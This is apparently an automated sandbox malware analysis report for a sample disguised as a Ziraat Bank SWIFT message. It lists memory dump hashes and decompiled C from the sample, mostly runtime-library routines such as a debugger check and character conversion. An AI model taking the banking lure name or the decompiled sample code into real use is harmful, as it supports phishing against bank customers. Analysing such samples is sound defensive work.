                                  • Source File: 00000003.00000002.552169525.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a82000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c5c159545d1760831b714e063e3cf14289e209ef9ee70085020d53f06b285c4
                                  • Instruction ID: 316f3e0255399f0fdad6303a2c5146e0823d64a1a8aa1ba77f2567f9db50f8a3
                                  • Opcode Fuzzy Hash: 1c5c159545d1760831b714e063e3cf14289e209ef9ee70085020d53f06b285c4
                                  • Instruction Fuzzy Hash: 9B51B17568E3D64FDB07A725A8757747FB19B6332574A40EBC485CF0E7D229480A8332
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 018e3942c8938944cd8567e2a9056e568be4db1b03ad610959fee71928b12fe8
                                  • Instruction ID: 1d23023328de8248b1052b07b346fa90d49fc432586a8b655f662eaf55369780
                                  • Opcode Fuzzy Hash: 018e3942c8938944cd8567e2a9056e568be4db1b03ad610959fee71928b12fe8
                                  • Instruction Fuzzy Hash: 0021B4B5508341AFD350CF19D880A5BBBE4FB89660F04896EF99897311E275E9088BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0beb849f6303fc11758316d9bc2e8a443204e59b3b12bb847e66b5ff58437c4
                                  • Instruction ID: a4566ed68f82afaf1e91ff7aa84d191a5cfbf32bbcfc91027e217738a3ec4423
                                  • Opcode Fuzzy Hash: f0beb849f6303fc11758316d9bc2e8a443204e59b3b12bb847e66b5ff58437c4
                                  • Instruction Fuzzy Hash: 6111BAB5508341AFD350CF19D880A5BFBE4FB88664F04896EF998D7311D335E9148FA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49d5c65f97f0251e577f4e45e4d3dea20e00fd9474dd8829150e65cbcfdc4551
                                  • Instruction ID: 0dffc61dd69aa6d2e0077799810047408ac3bf697f459e489e854fc965673c7e
                                  • Opcode Fuzzy Hash: 49d5c65f97f0251e577f4e45e4d3dea20e00fd9474dd8829150e65cbcfdc4551
                                  • Instruction Fuzzy Hash: 6CE0D8B254030467D3608F06AC81F13FB58EB40A30F04C467ED081B301E166B5148AE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d885d13d16eb0a07049a222aa965292ee133e6a036e709a989c2a1f7db618000
                                  • Instruction ID: 52b697ad3c32dc54f9b1643894ba64f4c34f839a532bddf2fd49a18748fb1bd4
                                  • Opcode Fuzzy Hash: d885d13d16eb0a07049a222aa965292ee133e6a036e709a989c2a1f7db618000
                                  • Instruction Fuzzy Hash: 2FE0D8B250030467D3608F06AC81F23FB58EB40A30F04C567ED081F302E166B5148AE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1654fe0becb98078612b1305b546be7a2085456269e8c3be9f4e7e2649fce5be
                                  • Instruction ID: ee72c3624de07b1d3280794e23bc4c033b3e4594decb2ee1b9b358930b6cd97e
                                  • Opcode Fuzzy Hash: 1654fe0becb98078612b1305b546be7a2085456269e8c3be9f4e7e2649fce5be
                                  • Instruction Fuzzy Hash: 44E0D8B254020467D2608E06AC81F13FB58EB40A30F04C467ED081B301E176B514CAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554735926.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_5400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2b5e4ee2ffc8a4034e12ce175db301fc486f0cf14ce2a516d46ac9b46fa6d26
                                  • Instruction ID: 6d51b2e148a400b32af4875a5b927ffc2bcfe7d5e33546ff620d428a8c0ab0b9
                                  • Opcode Fuzzy Hash: d2b5e4ee2ffc8a4034e12ce175db301fc486f0cf14ce2a516d46ac9b46fa6d26
                                  • Instruction Fuzzy Hash: 2FE048B254170467D2609E06AC85F53FB58EB40A30F04C56BED0D5B702E576B5149AF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552169525.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a82000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c61322bfeee7dbecc1da6348d5573a6551429c8f38dad1f1700434947735d43
                                  • Instruction ID: e6001a12969bf1054434c0b348e2309d01628c82d774c94d70621e11a0575a75
                                  • Opcode Fuzzy Hash: 9c61322bfeee7dbecc1da6348d5573a6551429c8f38dad1f1700434947735d43
                                  • Instruction Fuzzy Hash: F0D05E79244A824FD3269B1CD1A8BA53BD4AB51B04F4684FEA8408B6A3C768D981D710
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552169525.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a82000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1da435cfd2bdb02d10bd80acee4ae954c7dad6838ab9d9c8e9672c07100d10cb
                                  • Instruction ID: 81b8fe1ee5960e52ff17f1dbc708840dc80d57a30c6be12fa0b0418212283d8a
                                  • Opcode Fuzzy Hash: 1da435cfd2bdb02d10bd80acee4ae954c7dad6838ab9d9c8e9672c07100d10cb
                                  • Instruction Fuzzy Hash: A7D067742445814BD726EB1CD6A4F697BD4EB81B04F1644E9AC018B666C7A8DD81D700
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 74%
                                  			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v0;
                                  				signed int _v8;
                                  				intOrPtr _v524;
                                  				intOrPtr _v528;
                                  				void* _v532;
                                  				intOrPtr _v536;
                                  				char _v540;
                                  				intOrPtr _v544;
                                  				intOrPtr _v548;
                                  				intOrPtr _v552;
                                  				intOrPtr _v556;
                                  				intOrPtr _v560;
                                  				intOrPtr _v564;
                                  				intOrPtr _v568;
                                  				intOrPtr _v572;
                                  				intOrPtr _v576;
                                  				intOrPtr _v580;
                                  				intOrPtr _v584;
                                  				char _v724;
                                  				intOrPtr _v792;
                                  				intOrPtr _v800;
                                  				char _v804;
                                  				struct _EXCEPTION_POINTERS _v812;
                                  				void* __edi;
                                  				signed int _t40;
                                  				char* _t47;
                                  				char* _t49;
                                  				long _t57;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr _t64;
                                  				intOrPtr _t65;
                                  				int _t66;
                                  				intOrPtr _t68;
                                  				signed int _t69;
                                  
                                  				_t68 = __esi;
                                  				_t64 = __edx;
                                  				_t59 = __ebx;
                                  				_t40 =  *0x412014; // 0x22cc6355
                                  				_t41 = _t40 ^ _t69;
                                  				_v8 = _t40 ^ _t69;
                                  				_push(_t65);
                                  				if(_a4 != 0xffffffff) {
                                  					_push(_a4);
                                  					E00401E6A(_t41);
                                  					_pop(_t60);
                                  				}
                                  				E00402460(_t65,  &_v804, 0, 0x50);
                                  				E00402460(_t65,  &_v724, 0, 0x2cc);
                                  				_v812.ExceptionRecord =  &_v804;
                                  				_t47 =  &_v724;
                                  				_v812.ContextRecord = _t47;
                                  				_v548 = _t47;
                                  				_v552 = _t60;
                                  				_v556 = _t64;
                                  				_v560 = _t59;
                                  				_v564 = _t68;
                                  				_v568 = _t65;
                                  				_v524 = ss;
                                  				_v536 = cs;
                                  				_v572 = ds;
                                  				_v576 = es;
                                  				_v580 = fs;
                                  				_v584 = gs;
                                  				asm("pushfd");
                                  				_pop( *_t22);
                                  				_v540 = _v0;
                                  				_t49 =  &_v0;
                                  				_v528 = _t49;
                                  				_v724 = 0x10001;
                                  				_v544 =  *((intOrPtr*)(_t49 - 4));
                                  				_v804 = _a8;
                                  				_v800 = _a12;
                                  				_v792 = _v0;
                                  				_t66 = IsDebuggerPresent();
                                  				SetUnhandledExceptionFilter(0);
                                  				_t57 = UnhandledExceptionFilter( &_v812);
                                  				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                                  					_push(_a4);
                                  					_t57 = E00401E6A(_t57);
                                  				}
                                  				E004018CC();
                                  				return _t57;
                                  			}






































                                  0x0040446f
                                  0x0040446f
                                  0x0040446f
                                  0x0040447a
                                  0x0040447f
                                  0x00404481
                                  0x00404488
                                  0x00404489
                                  0x0040448b
                                  0x0040448e
                                  0x00404493
                                  0x00404493
                                  0x0040449f
                                  0x004044b2
                                  0x004044c0
                                  0x004044c6
                                  0x004044cc
                                  0x004044d2
                                  0x004044d8
                                  0x004044de
                                  0x004044e4
                                  0x004044ea
                                  0x004044f0
                                  0x004044f6
                                  0x004044fd
                                  0x00404504
                                  0x0040450b
                                  0x00404512
                                  0x00404519
                                  0x00404520
                                  0x00404521
                                  0x0040452a
                                  0x00404530
                                  0x00404533
                                  0x00404539
                                  0x00404546
                                  0x0040454f
                                  0x00404558
                                  0x00404561
                                  0x0040456f
                                  0x00404571
                                  0x0040457e
                                  0x00404586
                                  0x00404592
                                  0x00404595
                                  0x0040459a
                                  0x004045a1
                                  0x004045a9

                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00404567
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                  • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                                  • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                  • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004067FE() {
                                  				signed int _t3;
                                  
                                  				_t3 = GetProcessHeap();
                                  				 *0x4132b0 = _t3;
                                  				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                  			}




                                  0x004067fe
                                  0x00406806
                                  0x0040680e

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                  • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                                  • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                  • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                  				signed int _v8;
                                  				int _v12;
                                  				void* _v24;
                                  				signed int _t49;
                                  				signed int _t54;
                                  				int _t56;
                                  				signed int _t58;
                                  				short* _t60;
                                  				signed int _t64;
                                  				short* _t68;
                                  				int _t76;
                                  				short* _t79;
                                  				signed int _t85;
                                  				signed int _t88;
                                  				void* _t93;
                                  				void* _t94;
                                  				int _t96;
                                  				short* _t99;
                                  				int _t101;
                                  				int _t103;
                                  				signed int _t104;
                                  				short* _t105;
                                  				void* _t108;
                                  
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t49 =  *0x412014; // 0x22cc6355
                                  				_v8 = _t49 ^ _t104;
                                  				_t101 = _a20;
                                  				if(_t101 > 0) {
                                  					_t76 = E004080D8(_a16, _t101);
                                  					_t108 = _t76 - _t101;
                                  					_t4 = _t76 + 1; // 0x1
                                  					_t101 = _t4;
                                  					if(_t108 >= 0) {
                                  						_t101 = _t76;
                                  					}
                                  				}
                                  				_t96 = _a32;
                                  				if(_t96 == 0) {
                                  					_t96 =  *( *_a4 + 8);
                                  					_a32 = _t96;
                                  				}
                                  				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                  				_v12 = _t54;
                                  				if(_t54 == 0) {
                                  					L38:
                                  					E004018CC();
                                  					return _t54;
                                  				} else {
                                  					_t93 = _t54 + _t54;
                                  					_t83 = _t93 + 8;
                                  					asm("sbb eax, eax");
                                  					if((_t93 + 0x00000008 & _t54) == 0) {
                                  						_t79 = 0;
                                  						__eflags = 0;
                                  						L14:
                                  						if(_t79 == 0) {
                                  							L36:
                                  							_t103 = 0;
                                  							L37:
                                  							E004063D5(_t79);
                                  							_t54 = _t103;
                                  							goto L38;
                                  						}
                                  						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                  						_t119 = _t56;
                                  						if(_t56 == 0) {
                                  							goto L36;
                                  						}
                                  						_t98 = _v12;
                                  						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                  						_t103 = _t58;
                                  						if(_t103 == 0) {
                                  							goto L36;
                                  						}
                                  						if((_a12 & 0x00000400) == 0) {
                                  							_t94 = _t103 + _t103;
                                  							_t85 = _t94 + 8;
                                  							__eflags = _t94 - _t85;
                                  							asm("sbb eax, eax");
                                  							__eflags = _t85 & _t58;
                                  							if((_t85 & _t58) == 0) {
                                  								_t99 = 0;
                                  								__eflags = 0;
                                  								L30:
                                  								__eflags = _t99;
                                  								if(__eflags == 0) {
                                  									L35:
                                  									E004063D5(_t99);
                                  									goto L36;
                                  								}
                                  								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                  								__eflags = _t60;
                                  								if(_t60 == 0) {
                                  									goto L35;
                                  								}
                                  								_push(0);
                                  								_push(0);
                                  								__eflags = _a28;
                                  								if(_a28 != 0) {
                                  									_push(_a28);
                                  									_push(_a24);
                                  								} else {
                                  									_push(0);
                                  									_push(0);
                                  								}
                                  								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                  								__eflags = _t103;
                                  								if(_t103 != 0) {
                                  									E004063D5(_t99);
                                  									goto L37;
                                  								} else {
                                  									goto L35;
                                  								}
                                  							}
                                  							_t88 = _t94 + 8;
                                  							__eflags = _t94 - _t88;
                                  							asm("sbb eax, eax");
                                  							_t64 = _t58 & _t88;
                                  							_t85 = _t94 + 8;
                                  							__eflags = _t64 - 0x400;
                                  							if(_t64 > 0x400) {
                                  								__eflags = _t94 - _t85;
                                  								asm("sbb eax, eax");
                                  								_t99 = E00403E3D(_t85, _t64 & _t85);
                                  								_pop(_t85);
                                  								__eflags = _t99;
                                  								if(_t99 == 0) {
                                  									goto L35;
                                  								}
                                  								 *_t99 = 0xdddd;
                                  								L28:
                                  								_t99 =  &(_t99[4]);
                                  								goto L30;
                                  							}
                                  							__eflags = _t94 - _t85;
                                  							asm("sbb eax, eax");
                                  							E004018E0();
                                  							_t99 = _t105;
                                  							__eflags = _t99;
                                  							if(_t99 == 0) {
                                  								goto L35;
                                  							}
                                  							 *_t99 = 0xcccc;
                                  							goto L28;
                                  						}
                                  						_t68 = _a28;
                                  						if(_t68 == 0) {
                                  							goto L37;
                                  						}
                                  						_t123 = _t103 - _t68;
                                  						if(_t103 > _t68) {
                                  							goto L36;
                                  						}
                                  						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                  						if(_t103 != 0) {
                                  							goto L37;
                                  						}
                                  						goto L36;
                                  					}
                                  					asm("sbb eax, eax");
                                  					_t70 = _t54 & _t93 + 0x00000008;
                                  					_t83 = _t93 + 8;
                                  					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                  						__eflags = _t93 - _t83;
                                  						asm("sbb eax, eax");
                                  						_t79 = E00403E3D(_t83, _t70 & _t83);
                                  						_pop(_t83);
                                  						__eflags = _t79;
                                  						if(__eflags == 0) {
                                  							goto L36;
                                  						}
                                  						 *_t79 = 0xdddd;
                                  						L12:
                                  						_t79 =  &(_t79[4]);
                                  						goto L14;
                                  					}
                                  					asm("sbb eax, eax");
                                  					E004018E0();
                                  					_t79 = _t105;
                                  					if(_t79 == 0) {
                                  						goto L36;
                                  					}
                                  					 *_t79 = 0xcccc;
                                  					goto L12;
                                  				}
                                  			}


























                                  0x004078d4
                                  0x004078d5
                                  0x004078d6
                                  0x004078dd
                                  0x004078e2
                                  0x004078e8
                                  0x004078ee
                                  0x004078f4
                                  0x004078f7
                                  0x004078f7
                                  0x004078fa
                                  0x004078fc
                                  0x004078fc
                                  0x004078fa
                                  0x004078fe
                                  0x00407903
                                  0x0040790a
                                  0x0040790d
                                  0x0040790d
                                  0x00407929
                                  0x0040792f
                                  0x00407934
                                  0x00407ac7
                                  0x00407ad2
                                  0x00407ada
                                  0x0040793a
                                  0x0040793a
                                  0x0040793d
                                  0x00407942
                                  0x00407946
                                  0x0040799a
                                  0x0040799a
                                  0x0040799c
                                  0x0040799e
                                  0x00407abc
                                  0x00407abc
                                  0x00407abe
                                  0x00407abf
                                  0x00407ac5
                                  0x00000000
                                  0x00407ac5
                                  0x004079af
                                  0x004079b5
                                  0x004079b7
                                  0x00000000
                                  0x00000000
                                  0x004079bd
                                  0x004079cf
                                  0x004079d4
                                  0x004079d8
                                  0x00000000
                                  0x00000000
                                  0x004079e5
                                  0x00407a1f
                                  0x00407a22
                                  0x00407a25
                                  0x00407a27
                                  0x00407a29
                                  0x00407a2b
                                  0x00407a77
                                  0x00407a77
                                  0x00407a79
                                  0x00407a79
                                  0x00407a7b
                                  0x00407ab5
                                  0x00407ab6
                                  0x00000000
                                  0x00407abb
                                  0x00407a8f
                                  0x00407a94
                                  0x00407a96
                                  0x00000000
                                  0x00000000
                                  0x00407a9a
                                  0x00407a9b
                                  0x00407a9c
                                  0x00407a9f
                                  0x00407adb
                                  0x00407ade
                                  0x00407aa1
                                  0x00407aa1
                                  0x00407aa2
                                  0x00407aa2
                                  0x00407aaf
                                  0x00407ab1
                                  0x00407ab3
                                  0x00407ae4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407ab3
                                  0x00407a2d
                                  0x00407a30
                                  0x00407a32
                                  0x00407a34
                                  0x00407a36
                                  0x00407a39
                                  0x00407a3e
                                  0x00407a59
                                  0x00407a5b
                                  0x00407a65
                                  0x00407a67
                                  0x00407a68
                                  0x00407a6a
                                  0x00000000
                                  0x00000000
                                  0x00407a6c
                                  0x00407a72
                                  0x00407a72
                                  0x00000000
                                  0x00407a72
                                  0x00407a40
                                  0x00407a42
                                  0x00407a46
                                  0x00407a4b
                                  0x00407a4d
                                  0x00407a4f
                                  0x00000000
                                  0x00000000
                                  0x00407a51
                                  0x00000000
                                  0x00407a51
                                  0x004079e7
                                  0x004079ec
                                  0x00000000
                                  0x00000000
                                  0x004079f2
                                  0x004079f4
                                  0x00000000
                                  0x00000000
                                  0x00407a10
                                  0x00407a14
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407a1a
                                  0x0040794d
                                  0x0040794f
                                  0x00407951
                                  0x00407959
                                  0x00407978
                                  0x0040797a
                                  0x00407984
                                  0x00407986
                                  0x00407987
                                  0x00407989
                                  0x00000000
                                  0x00000000
                                  0x0040798f
                                  0x00407995
                                  0x00407995
                                  0x00000000
                                  0x00407995
                                  0x0040795d
                                  0x00407961
                                  0x00407966
                                  0x0040796a
                                  0x00000000
                                  0x00000000
                                  0x00407970
                                  0x00000000
                                  0x00407970

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                  • __alloca_probe_16.LIBCMT ref: 00407961
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                  • __alloca_probe_16.LIBCMT ref: 00407A46
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                  • __freea.LIBCMT ref: 00407AB6
                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                  • __freea.LIBCMT ref: 00407ABF
                                  • __freea.LIBCMT ref: 00407AE4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 3864826663-0
                                  • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                  • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                  • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                  • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                  				signed int _v8;
                                  				signed char _v15;
                                  				char _v16;
                                  				void _v24;
                                  				short _v28;
                                  				char _v31;
                                  				void _v32;
                                  				long _v36;
                                  				intOrPtr _v40;
                                  				void* _v44;
                                  				signed int _v48;
                                  				signed char* _v52;
                                  				long _v56;
                                  				int _v60;
                                  				void* __ebx;
                                  				signed int _t78;
                                  				signed int _t80;
                                  				int _t86;
                                  				void* _t93;
                                  				long _t96;
                                  				void _t104;
                                  				void* _t111;
                                  				signed int _t115;
                                  				signed int _t118;
                                  				signed char _t123;
                                  				signed char _t128;
                                  				intOrPtr _t129;
                                  				signed int _t131;
                                  				signed char* _t133;
                                  				intOrPtr* _t136;
                                  				signed int _t138;
                                  				void* _t139;
                                  
                                  				_t78 =  *0x412014; // 0x22cc6355
                                  				_v8 = _t78 ^ _t138;
                                  				_t80 = _a8;
                                  				_t118 = _t80 >> 6;
                                  				_t115 = (_t80 & 0x0000003f) * 0x30;
                                  				_t133 = _a12;
                                  				_v52 = _t133;
                                  				_v48 = _t118;
                                  				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                  				_v40 = _a16 + _t133;
                                  				_t86 = GetConsoleCP();
                                  				_t136 = _a4;
                                  				_v60 = _t86;
                                  				 *_t136 = 0;
                                  				 *((intOrPtr*)(_t136 + 4)) = 0;
                                  				 *((intOrPtr*)(_t136 + 8)) = 0;
                                  				while(_t133 < _v40) {
                                  					_v28 = 0;
                                  					_v31 =  *_t133;
                                  					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                  					_t123 =  *(_t129 + _t115 + 0x2d);
                                  					if((_t123 & 0x00000004) == 0) {
                                  						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                  							_push(1);
                                  							_push(_t133);
                                  							goto L8;
                                  						} else {
                                  							if(_t133 >= _v40) {
                                  								_t131 = _v48;
                                  								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                  								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                  								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                  							} else {
                                  								_t111 = E00407222( &_v28, _t133, 2);
                                  								_t139 = _t139 + 0xc;
                                  								if(_t111 != 0xffffffff) {
                                  									_t133 =  &(_t133[1]);
                                  									goto L9;
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						_t128 = _t123 & 0x000000fb;
                                  						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                  						_push(2);
                                  						_v15 = _t128;
                                  						 *(_t129 + _t115 + 0x2d) = _t128;
                                  						_push( &_v16);
                                  						L8:
                                  						_push( &_v28);
                                  						_t93 = E00407222();
                                  						_t139 = _t139 + 0xc;
                                  						if(_t93 != 0xffffffff) {
                                  							L9:
                                  							_t133 =  &(_t133[1]);
                                  							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                  							_v56 = _t96;
                                  							if(_t96 != 0) {
                                  								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                  									L19:
                                  									 *_t136 = GetLastError();
                                  								} else {
                                  									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                  									if(_v36 >= _v56) {
                                  										if(_v31 != 0xa) {
                                  											goto L16;
                                  										} else {
                                  											_t104 = 0xd;
                                  											_v32 = _t104;
                                  											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                  												goto L19;
                                  											} else {
                                  												if(_v36 >= 1) {
                                  													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                  													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                  													goto L16;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L20;
                                  					L16:
                                  				}
                                  				L20:
                                  				E004018CC();
                                  				return _t136;
                                  			}



































                                  0x0040822b
                                  0x00408232
                                  0x00408235
                                  0x0040823d
                                  0x00408241
                                  0x0040824d
                                  0x00408250
                                  0x00408253
                                  0x0040825a
                                  0x00408262
                                  0x00408265
                                  0x0040826b
                                  0x00408271
                                  0x00408276
                                  0x00408278
                                  0x0040827b
                                  0x00408280
                                  0x0040828a
                                  0x00408291
                                  0x00408294
                                  0x0040829b
                                  0x004082a2
                                  0x004082ce
                                  0x004082f4
                                  0x004082f6
                                  0x00000000
                                  0x004082d0
                                  0x004082d3
                                  0x0040839a
                                  0x004083a6
                                  0x004083b1
                                  0x004083b6
                                  0x004082d9
                                  0x004082e0
                                  0x004082e5
                                  0x004082eb
                                  0x004082f1
                                  0x00000000
                                  0x004082f1
                                  0x004082eb
                                  0x004082d3
